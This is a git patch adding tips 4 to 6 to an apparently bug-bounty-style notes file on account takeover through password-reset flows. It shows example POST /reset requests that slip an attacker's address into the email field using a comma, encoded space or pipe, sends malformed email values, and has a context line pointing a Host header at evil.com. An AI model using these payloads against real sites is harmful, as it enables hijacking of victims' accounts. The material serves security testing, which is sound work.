From 35198d15d78e77da5add8e29a538e25c477b784b Mon Sep 17 00:00:00 2001
From: Muhammad Daffa <36522826+MD15@users.noreply.github.com>
Date: Thu, 3 Sep 2020 21:04:19 +0700
Subject: [PATCH] Account Takover [2]

Add 3 tips
---
 AccountTakeover.md | 33 ++++++++++++++++++++++++++++++++-
 1 file changed, 32 insertions(+), 1 deletion(-)

diff --git a/AccountTakeover.md b/AccountTakeover.md
index ecda1fb..2508254 100644
--- a/AccountTakeover.md
+++ b/AccountTakeover.md
@@ -21,4 +21,35 @@ Host: evil.com
 [...]
 email=victim@mail.com
 ```
-And the victim will receive the reset link with your evil.com
+And the victim will receive the reset link with evil.com
+
+4. Using separator in value of the parameter
+```
+POST /reset
+[...]
+email=victim@mail.com,hacker@mail.com
+```
+```
+POST /reset
+[...]
+email=victim@mail.com%20hacker@mail.com
+```
+```
+POST /reset
+[...]
+email=victim@mail.com|hacker@mail.com
+```
+
+5. No domain in value of the paramter
+```
+POST /reset
+[...]
+email=victim
+```
+
+6. No TLD in value of the paramter
+```
+POST /reset
+[...]
+email=victim@mail
+```